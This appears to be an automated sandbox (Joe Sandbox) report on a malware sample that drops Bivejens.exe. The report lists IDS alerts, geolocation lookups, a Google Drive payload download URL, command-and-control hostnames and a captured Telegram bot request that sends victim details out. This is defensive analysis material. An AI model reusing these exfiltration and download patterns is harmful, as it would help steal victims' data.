Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49937 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49918 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49974 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49943 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49984 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49883 -> 142.250.181.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49954 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49931 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49925 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 23:41:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TjoY7n65om.exe, Bivejens.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en(lm
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E87A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/k
Source: Bivejens.exe, 00000005.00000002.2598208321.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2597746067.0000000002672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V
Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V4
Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/downloa
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download
Source: Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download)
Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/p
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E738000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8B0000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/(lm
Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49987 version: TLS 1.2

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040542B

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Jump to dropped file

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00403359 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,		5_2_00403359

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00404C68	5_2_00404C68
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0040698E	5_2_0040698E
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015C19B	5_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015D278	5_2_0015D278
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00155370	5_2_00155370
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015C474	5_2_0015C474
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015C738	5_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015E988	5_2_0015E988
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_001569E0	5_2_001569E0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_001529EC	5_2_001529EC
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015CA08	5_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015CCD8	5_2_0015CCD8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00159E83	5_2_00159E83
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015CFAC	5_2_0015CFAC
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00156FC8	5_2_00156FC8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015E97C	5_2_0015E97C
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21099548	5_2_21099548
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21092968	5_2_21092968
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21095028	5_2_21095028
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109FC68	5_2_2109FC68
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21099C70	5_2_21099C70
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109CCA0	5_2_2109CCA0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21090B30	5_2_21090B30
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_210917A0	5_2_210917A0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21091E80	5_2_21091E80
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D540	5_2_2109D540
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109295A	5_2_2109295A
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D550	5_2_2109D550
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D9A8	5_2_2109D9A8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D9A5	5_2_2109D9A5
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D9A7	5_2_2109D9A7
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109DDF1	5_2_2109DDF1
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109F805	5_2_2109F805
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21095018	5_2_21095018
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109F810	5_2_2109F810
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21090012	5_2_21090012
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21090040	5_2_21090040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21099C5F	5_2_21099C5F
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D0E9	5_2_2109D0E9
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109D0F8	5_2_2109D0F8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109EB08	5_2_2109EB08
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21090B20	5_2_21090B20
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109EF51	5_2_2109EF51
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109EF60	5_2_2109EF60
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_2109178F	5_2_2109178F
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21098B91	5_2_21098B91
